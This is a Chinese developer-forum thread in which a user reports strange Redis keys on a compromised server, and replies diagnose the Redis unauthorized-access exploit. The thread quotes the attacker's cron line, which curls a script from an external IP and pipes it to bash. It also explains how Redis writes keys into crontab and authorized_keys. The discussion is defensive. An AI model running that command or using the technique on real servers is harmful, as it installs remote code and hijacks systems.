这是一个创建于 2418 天前的主题,其中的信息可能已经有所发展或是发生改变。
一条内容是
-e
*/10 * * * * curl -s http://207.226.143.174:443/reinstall.sh | bash
另一条是
ssh-a xxxxxxxxxx...
root@hxkvm
不是很明白,目前只开放了 redis mysql 和 ssh 这三个端口
第 1 条附言 · 2018-03-28 14:47:37 +08:00
关了 ,先用本地 docker 了
 |
1
tomczhen 2018-03-28 09:44:04 +08:00
请个运维吧,兼职的也行。
|
 |
2
ericls 2018-03-28 09:46:34 +08:00 via iPhone
你看看你的 authorized_keys 有没有被串改?
|
 |
4
dltsgl 2018-03-28 10:04:29 +08:00
redis 没密码吧?被人远程攻击了?
|
 |
5
iamsee 2018-03-28 11:23:48 +08:00
这是被攻击了
|
 |
7
SakuraKuma 2018-03-28 12:12:58 +08:00
装好没启动之前就应该设置密码。
|
 |
8
loongwang OP @SakuraKuma。。。gg,先用着了
|
 |
9
airycanon 2018-03-28 13:16:05 +08:00
redis-cli 然后 CONFIG GET dir 看看值是什么。
|
 |
11
lairdnote 2018-03-28 13:36:50 +08:00
兼职的运维要吗?
|
 |
12
msg7086 2018-03-28 14:30:07 +08:00
被人入侵了的话:
1. 如果你 root 账号被人拿到的话,除了重装系统,你不可能把系统弄干净。 2. 如果你服务器被人入侵以后干坏事的话,你需要付法律责任。 |
 |
13
SourceMan 2018-03-28 14:48:56 +08:00
redis 不是默认改端口、禁外网的吗?
|
 |
14
abmin521 2018-03-28 16:22:14 +08:00
redis 未授权漏洞
|
 |
15
julyclyde 2018-03-29 08:28:52 +08:00
这格式像 crontab 啊
问题是 crontab 不能通过网络注入吧? |
|
17
airycanon 2018-04-24 09:48:26 +08:00
未读提醒有问题,没看到你的回复。
你需要注意 redis 配置的 dir 和 dbfilename,因为 redis 在执行 bgsave 的时候会把 key 写入文件 dir/dbfilename 中。 第一个 key 如果写入 /var/spool/cron 里,就可以变成 crontab 定时任务。 第二个 key 很明显就是 ssh 公钥了,可以直接 ssh 登录。 如果你的 redis 需要开放到公网,不要用 root 用户启动,最好加个验证并设置 bing ip。 |
Select Language